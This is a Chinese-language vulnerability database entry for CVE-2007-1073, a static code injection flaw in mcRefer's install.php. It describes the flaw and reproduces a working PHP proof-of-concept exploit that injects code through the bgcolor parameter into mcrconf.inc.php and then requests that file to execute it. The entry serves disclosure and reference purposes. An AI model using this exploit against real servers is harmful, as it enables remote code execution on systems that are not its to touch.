mcRefer的install.php静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191602 漏洞类型 代码注入
发布时间 2007-02-22 更新时间 2007-02-22
CVE编号 CVE-2007-1073 CNNVD-ID CNNVD-200702-433
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/86571
https://cxsecurity.com/issue/WLB-2007020086
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-433
|漏洞详情
mcRefer的install.php中存在静态代码注入漏洞。远程攻击者可以通过bgcolor参数,执行任意的PHP代码。Bgcolor参数会被嵌入mcrconf.inc.php中。
|漏洞EXP
This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----

#!/usr/bin/php
<?php
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig (at) gmail (dot) com [email concealed]
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7
D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url
=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());
|受影响的产品
McRefer McRefer 0
|参考资料

来源:BUGTRAQ
名称:20070211Re:mcReferSQLinjection
链接:http://www.securityfocus.com/archive/1/archive/1/459796/100/200/threaded
来源:OSVDB
名称:42619
链接:http://osvdb.org/42619
来源:SREASON
名称:2283
链接:http://securityreason.com/securityalert/2283